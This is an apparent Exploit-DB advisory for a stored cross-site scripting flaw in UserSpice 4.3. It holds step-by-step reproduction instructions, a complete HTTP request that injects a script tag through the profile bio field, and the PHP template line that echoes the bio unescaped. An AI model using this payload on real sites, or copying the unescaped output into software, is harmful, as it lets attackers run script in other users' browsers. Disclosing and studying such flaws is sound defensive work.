userSpice 4.3 - Cross-Site Scripting

EDB-ID:

44038

CVE:

N/A

EDB Verified:

Author:

Dolev Farhi

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2018-02-14

Vulnerable App: 
Application UserSpice PHP user management
Vulnerability userSpice <= 4.3 Persistent Cross Site Scripting
URL https://userspice.com
Date 2.13.2018
Author Dolev Farhi


1. Login with a regular user
2. Navigate to Public profile
3. Edit your bio
4. Enter XSS payload
5. Once anyone visits the Bio page the payload will execute

POST /users/edit_profile.php HTTP/1.1
Host: 192.168.56.2
Content-Length: 59
Cache-Control: max-age=0
Origin: http://192.168.56.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.56.2/users/edit_profile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,he;q=0.8
Connection: close

bio=<script>alert("1")</script>&csrf=8b1339546d6af1e7536da0a705302e9c&update_bio=

Vulnerable code: 
<td>
    <h4><a href="profile.php?id=<?=$v1->id?>" class="nounderline"><?=echouser($v1->id)?>  </a></h4>
    <p><?=$ususerbio?></p>
</td>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services